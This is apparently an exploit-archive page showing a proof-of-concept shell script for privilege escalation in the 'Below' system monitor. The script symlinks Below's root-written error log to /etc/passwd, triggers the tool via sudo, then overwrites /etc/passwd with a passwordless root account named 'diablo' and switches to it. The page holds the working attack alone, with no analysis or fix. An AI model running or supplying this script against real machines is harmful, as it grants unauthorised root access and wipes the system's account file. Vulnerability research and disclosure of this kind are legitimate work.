4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / exploit.sh SH
#!/bin/bash
# Exploit for Below privilege escalation
# Creates a root user 'diablo' via /var/log/below/error_root.log

# Temporary file
TMP_FILE="/tmp/fake_diablo_passwd"

echo "[*] Creating fake root user entry for 'diablo'..."
echo 'diablo::0:0:diablo:/root:/bin/bash' > "$TMP_FILE"
echo "[+] Temporary passwd file created at $TMP_FILE"

echo "[*] Removing original Below log file if it exists..."
rm -f /var/log/below/error_root.log
echo "[+] Removed old error_root.log"

echo "[*] Creating symlink from /var/log/below/error_root.log -> /etc/passwd..."
ln -s /etc/passwd /var/log/below/error_root.log
echo "[+] Symlink created"

echo "[*] Running Below to log error..."
sudo /usr/bin/below snapshot --begin veryfake &> /dev/null
echo "[+] Below triggered (error logged as 'running below to log error')"

echo "[*] Overwriting Below log with fake passwd entry..."
cp "$TMP_FILE" /var/log/below/error_root.log
echo "[+] Fake passwd entry applied"

echo "[*] Cleaning up temporary file..."
rm -f "$TMP_FILE"
echo "[+] Temporary file removed"

echo "[*] Switching to new root user 'diablo'..."
su diablo